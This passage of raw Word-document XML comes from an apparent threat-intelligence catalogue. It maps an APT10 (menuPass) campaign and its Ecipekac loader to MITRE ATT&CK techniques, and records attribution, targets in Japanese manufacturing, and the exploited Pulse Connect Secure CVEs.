      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006152F1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Dynamic Resolution&gt;:Fast Flux DNS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C842DD1"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 xml:space="preserve">Next Technique is </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006152F1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T1090.002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006152F1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Proxy&gt;:External Proxy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75DE94DF" w14:textId="77777777" w:rsidR="006152F1" w:rsidRPr="006152F1" w:rsidRDefault="006152F1" w:rsidP="00556E97">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006152F1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Next Technique is T</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006152F1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1105 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006152F1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Ingress Tool Transfer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77022937" w14:textId="77777777" w:rsidR="006152F1" w:rsidRPr="006152F1"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0010 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006152F1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Exfiltration []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27CF08B7" w14:textId="28F42D13" w:rsidR="006152F1" w:rsidRPr="00BB4629" w:rsidRDefault="006152F1" w:rsidP="006152F1">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006152F1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Next tactic is TA</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006152F1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>0040 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006152F1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Impact []</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB4629">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F56F769" w14:textId="77777777" w:rsidR="006152F1" w:rsidRPr="005935F8" w:rsidRDefault="006152F1" w:rsidP="006152F1">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="265E72A1" w14:textId="2893230F" w:rsidR="006152F1" w:rsidRDefault="00B077DA" w:rsidP="006152F1">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:bookmarkStart w:id="113" w:name="_Toc153480888"/>
      <w:r w:rsidRPr="00B077DA">
        <w:t xml:space="preserve">APT10: sophisticated multi-layered loader </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B077DA">
        <w:t>Ecipekac</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B077DA">
        <w:t xml:space="preserve"> discovered in A41APT campaign</w:t>
      </w:r>
      <w:bookmarkEnd w:id="113"/>
    </w:p>
    <w:p w14:paraId="10604B28" w14:textId="77777777" w:rsidR="006152F1" w:rsidRDefault="006152F1" w:rsidP="006152F1">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6152F1" w:rsidRPr="002D1D50" w14:paraId="28C9574C" w14:textId="77777777" w:rsidTr="00DD0478">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="592FE7A4" w14:textId="77777777" w:rsidR="006152F1" w:rsidRPr="002D1D50" w:rsidRDefault="006152F1" w:rsidP="00DD0478">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Dimension</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1DD65B91" w14:textId="77777777" w:rsidR="006152F1" w:rsidRPr="002D1D50" w:rsidRDefault="006152F1" w:rsidP="00DD0478">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D1D50">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Technique</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="43838D1D" w14:textId="77777777" w:rsidR="006152F1" w:rsidRPr="00387DCC" w:rsidRDefault="006152F1" w:rsidP="00DD0478">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00387DCC">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Notes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006152F1" w:rsidRPr="00B857D7" w14:paraId="2297212F" w14:textId="77777777" w:rsidTr="00DD0478">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4F26B635" w14:textId="77777777" w:rsidR="006152F1" w:rsidRDefault="006152F1" w:rsidP="00DD0478">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Attribution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1B28E08E" w14:textId="73818CF4" w:rsidR="006152F1" w:rsidRDefault="00ED23A8" w:rsidP="00DD0478">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>menuPass</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0A3B5E23" w14:textId="77777777" w:rsidR="006152F1" w:rsidRPr="00387DCC" w:rsidRDefault="006152F1" w:rsidP="00DD0478">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006152F1" w:rsidRPr="00B857D7" w14:paraId="7A6FB9FA" w14:textId="77777777" w:rsidTr="00DD0478">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1AE0D1F5" w14:textId="77777777" w:rsidR="006152F1" w:rsidRPr="007328DE" w:rsidRDefault="006152F1" w:rsidP="00DD0478">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Initial Access Vector</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3DE35B3A" w14:textId="0CB19944" w:rsidR="006152F1" w:rsidRPr="007328DE" w:rsidRDefault="00D65522" w:rsidP="00DD0478">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">1190 </w:t>
            </w:r>
            <w:r w:rsidR="006152F1" w:rsidRPr="007328DE">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidR="006152F1" w:rsidRPr="007328DE">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Exploit Public Facing Application</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="562F94E3" w14:textId="632EB700" w:rsidR="006152F1" w:rsidRPr="00387DCC" w:rsidRDefault="00C53574" w:rsidP="00DD0478">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008D6D8A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>[</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidRPr="008D6D8A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>]</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="0019215C">
              <w:t>The actor leveraged vulnerabilities in Pulse Connect Secure in order to hijack VPN sessions, or took advantage of system credentials that were stolen in previous operations.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006152F1" w:rsidRPr="00B857D7" w14:paraId="4B9BDEC3" w14:textId="77777777" w:rsidTr="00DD0478">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2B3EB324" w14:textId="77777777" w:rsidR="006152F1" w:rsidRDefault="006152F1" w:rsidP="00DD0478">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Attack Origin</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1F6B47B8" w14:textId="233274FF" w:rsidR="006152F1" w:rsidRPr="007328DE" w:rsidRDefault="00D65522" w:rsidP="00DD0478">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>China</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="71AB16F0" w14:textId="5A0DCEBA" w:rsidR="006152F1" w:rsidRPr="00387DCC" w:rsidRDefault="006152F1" w:rsidP="00DD0478">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Via TCERT</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006152F1" w:rsidRPr="00B857D7" w14:paraId="0A71201C" w14:textId="77777777" w:rsidTr="00DD0478">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="35BDB622" w14:textId="77777777" w:rsidR="006152F1" w:rsidRDefault="006152F1" w:rsidP="00DD0478">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Target Location</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4A010148" w14:textId="72C6F321" w:rsidR="006152F1" w:rsidRDefault="00D65522" w:rsidP="00DD0478">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Japan</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="239AF336" w14:textId="6F9E7166" w:rsidR="006152F1" w:rsidRPr="00387DCC" w:rsidRDefault="006152F1" w:rsidP="00DD0478">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>[</w:t>
            </w:r>
            <w:r w:rsidR="0065494E">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">] </w:t>
            </w:r>
            <w:r w:rsidR="0065494E" w:rsidRPr="0065494E">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>In 2019, we observed an APT campaign targeting multiple industries, including the Japanese manufacturing industry and its overseas operations, that was designed to steal information.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006152F1" w:rsidRPr="00B857D7" w14:paraId="0B690E4C" w14:textId="77777777" w:rsidTr="00DD0478">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="30E97C35" w14:textId="77777777" w:rsidR="006152F1" w:rsidRDefault="006152F1" w:rsidP="00DD0478">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Target Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="084ED346" w14:textId="036C8509" w:rsidR="006152F1" w:rsidRDefault="0065494E" w:rsidP="00DD0478">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Manufacturing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="530BEBFC" w14:textId="0BDC17CF" w:rsidR="006152F1" w:rsidRPr="00387DCC" w:rsidRDefault="006152F1" w:rsidP="00DD0478">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>[</w:t>
            </w:r>
            <w:r w:rsidR="0065494E">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>] See above</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006152F1" w:rsidRPr="00B857D7" w14:paraId="649F41C9" w14:textId="77777777" w:rsidTr="00DD0478">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="585634BA" w14:textId="77777777" w:rsidR="006152F1" w:rsidRDefault="006152F1" w:rsidP="00DD0478">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7E31A978" w14:textId="77777777" w:rsidR="006152F1" w:rsidRDefault="006152F1" w:rsidP="00DD0478">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>Exfiltration (confidentiality)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="523F61FE" w14:textId="77777777" w:rsidR="006152F1" w:rsidRDefault="006152F1" w:rsidP="00DD0478">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006152F1" w:rsidRPr="00B857D7" w14:paraId="30CB67BD" w14:textId="77777777" w:rsidTr="00DD0478">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4CABA72B" w14:textId="77777777" w:rsidR="006152F1" w:rsidRDefault="006152F1" w:rsidP="00DD0478">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Vulnerabilities Exploited</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7038ECB8" w14:textId="584D0ACF" w:rsidR="006152F1" w:rsidRDefault="0065494E" w:rsidP="00DD0478">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0065494E">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>["CVE-2019-11510", "CVE-2019-11539"]</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="52DE2F5A" w14:textId="7254E66B" w:rsidR="006152F1" w:rsidRDefault="0065494E" w:rsidP="00DD0478">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">[2] </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006152F1" w:rsidRPr="00B857D7" w14:paraId="7C6765B0" w14:textId="77777777" w:rsidTr="00DD0478">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0657818D" w14:textId="77777777" w:rsidR="006152F1" w:rsidRDefault="006152F1" w:rsidP="00DD0478">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Related Attack Patterns</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6611A110" w14:textId="77777777" w:rsidR="006152F1" w:rsidRDefault="006152F1" w:rsidP="00DD0478">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4D5CCE69" w14:textId="77777777" w:rsidR="006152F1" w:rsidRDefault="006152F1" w:rsidP="00DD0478">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006152F1" w:rsidRPr="00B857D7" w14:paraId="1A7C0438" w14:textId="77777777" w:rsidTr="00DD0478">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="25B4FF16" w14:textId="77777777" w:rsidR="006152F1" w:rsidRDefault="006152F1" w:rsidP="00DD0478">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Preceded By</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2BAAA312" w14:textId="77777777" w:rsidR="006152F1" w:rsidRDefault="006152F1" w:rsidP="00DD0478">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>NA</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4C3EA63B" w14:textId="77777777" w:rsidR="006152F1" w:rsidRDefault="006152F1" w:rsidP="00DD0478">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">Reference </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Chain_ID</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006152F1" w:rsidRPr="00B857D7" w14:paraId="747C6759" w14:textId="77777777" w:rsidTr="00DD0478">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="22BAA991" w14:textId="77777777" w:rsidR="006152F1" w:rsidRDefault="006152F1" w:rsidP="00DD0478">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Schema Version</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6E07F59E" w14:textId="77777777" w:rsidR="006152F1" w:rsidRDefault="006152F1" w:rsidP="00DD0478">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>0.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4266955A" w14:textId="77777777" w:rsidR="006152F1" w:rsidRDefault="006152F1" w:rsidP="00DD0478">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>To allow for future new chain models</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006152F1" w:rsidRPr="00B857D7" w14:paraId="208120A1" w14:textId="77777777" w:rsidTr="00DD0478">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6395B060" w14:textId="77777777" w:rsidR="006152F1" w:rsidRDefault="006152F1" w:rsidP="00DD0478">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="009C3436" w14:textId="27AF518A" w:rsidR="006152F1" w:rsidRDefault="006152F1" w:rsidP="00DD0478">
            <w:pPr>
